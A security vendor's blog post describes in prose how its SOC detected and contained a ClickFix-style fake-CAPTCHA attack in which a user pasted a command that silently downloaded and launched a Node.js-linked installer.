Prepared by: Philip O'Dwyer | Last update: 13 April 2026
This article explores a ClickFix-style social engineering technique where users unknowingly execute malicious commands, bypassing traditional security controls. Learn how Triskele’s SOC analysts identified suspicious behaviour using endpoint telemetry, investigated the attack chain, and ensured it was contained before impact. The case highlights the growing risk of user-driven attacks, the limitations of signature-based detection, and the importance of behavioural monitoring, rapid response, and human-led analysis in modern cybersecurity operations.
During routine business activity, a standard end user within a monitored environment copied and executed a command from a website, following what appeared to be a legitimate CAPTCHA verification step. The action took place on an endpoint monitored by Triskele Labs’ Security Operations Centre, and at first glance, nothing about the interaction seemed out of the ordinary.
However, this seemingly harmless behaviour quickly triggered a high-severity alert. What followed was a rapid investigation by Triskele’s SOC analysts, who identified the activity as part of a malware delivery attempt designed to blend in with normal user behaviour.
The incident reflects a broader shift in cyber threats. Rather than exploiting technical vulnerabilities, attackers are increasingly relying on deception and familiarity, using trusted interactions to manipulate users into initiating the attack themselves.
The activity aligned with a known social engineering technique often referred to as ClickFix or FakeCaptcha. These attacks rely on something users encounter every day — CAPTCHA prompts.
Instead of simply verifying identity, the user is presented with instructions to complete an additional step, typically framed as resolving an error. This step involves copying and executing a command.
Because the interaction feels familiar and low-risk, users often comply without hesitation.
A typical sequence includes:
A CAPTCHA-style prompt appears on a website
The user clicks to proceed
An error message appears with instructions
The user is told to copy and paste a command into Run or PowerShell
The command silently executes malicious activity
On the surface, this appears routine, but in reality, it is a direct execution pathway for an attacker.
Triskele’s SOC received a high-severity alert triggered by suspicious behavioural activity on an endpoint.
Using endpoint telemetry, analysts identified that a command had been executed shortly after a user interaction with a web page. While the action itself — copying and running a command — is not inherently malicious, the sequence and context raised immediate concern.
This is where behavioural detection becomes critical. Rather than relying on known malware signatures, the SOC focused on how the activity unfolded.
Further investigation revealed a clear pattern:
A command shell initiated execution
A legitimate tool was used to download a file from an external source
The file was saved to a temporary directory
A system installer utility executed the file in silent mode
From the user’s perspective, nothing appeared to happen. There were no prompts, no warnings, and no visible installation process.
From an analyst’s perspective, the behaviour matched early-stage malware delivery techniques.
This is a classic example of “living-off-the-land” — where attackers use trusted, built-in system tools to carry out malicious actions. By doing so, they reduce the likelihood of detection and blend into normal system activity.
The file being delivered appeared to be associated with Node.js, a legitimate and widely used framework. This added a layer of credibility to the activity.
Had execution completed successfully, it could have established a directory and used Node.js to run malicious scripts in the background.
Because the tools and processes involved were legitimate, this activity could easily have gone unnoticed without behavioural analysis.
Triskele’s SOC analysts validated the alert, investigated the execution chain, and confirmed the activity as malicious based on behavioural indicators.
Crucially, this was not a case of relying on a single alert or automated decision. The SOC:
Analysed command-line behaviour in context
Identified anomalies in execution flow
Assessed intent, not just activity
Confirmed the absence of legitimate business justification
Using endpoint telemetry as a signal source, analysts ensured the activity was contained before it could progress.
The installer did not complete, no persistence mechanisms were established, and there was no evidence of further compromise.
This outcome was not just detection — it was informed, human-led response.
This incident highlights a broader challenge in modern cybersecurity.
Attackers are no longer relying solely on malware that looks malicious. Instead, they are using legitimate tools, familiar workflows, and trusted applications to carry out attacks.
The question is no longer just “is this file malicious?”
It is “does this behaviour make sense?”
That distinction is where traditional controls often fall short.
This type of attack reinforces several key points:
User behaviour is now a primary attack vector
Even simple actions, like copying a command, can introduce significant risk
Familiar interfaces can be deceptive
CAPTCHAs and error prompts are being actively weaponised
Signature-based detection is not enough
Threats that use legitimate tools require behavioural analysis
Visibility into command-line activity is critical
Understanding how processes execute provides essential context
Preventing every user action is not realistic. Users will continue to interact with content, follow instructions, and make decisions in real time.
The focus must shift from prevention alone to resilience.
Triskele Labs’ SOC is designed to identify behavioural patterns, investigate anomalies, and respond before activity becomes a compromise.
By combining endpoint telemetry, detection engineering, and analyst-driven investigation, potentially harmful actions can be contained before they escalate.
A user may still paste a command - the difference is whether that action leads to compromise or is stopped in its tracks.
SOC Technical Analysis: https://www.triskelelabs.com/blog/soc-technical-analysis-copy-paste-action-becomes-a-security-incident
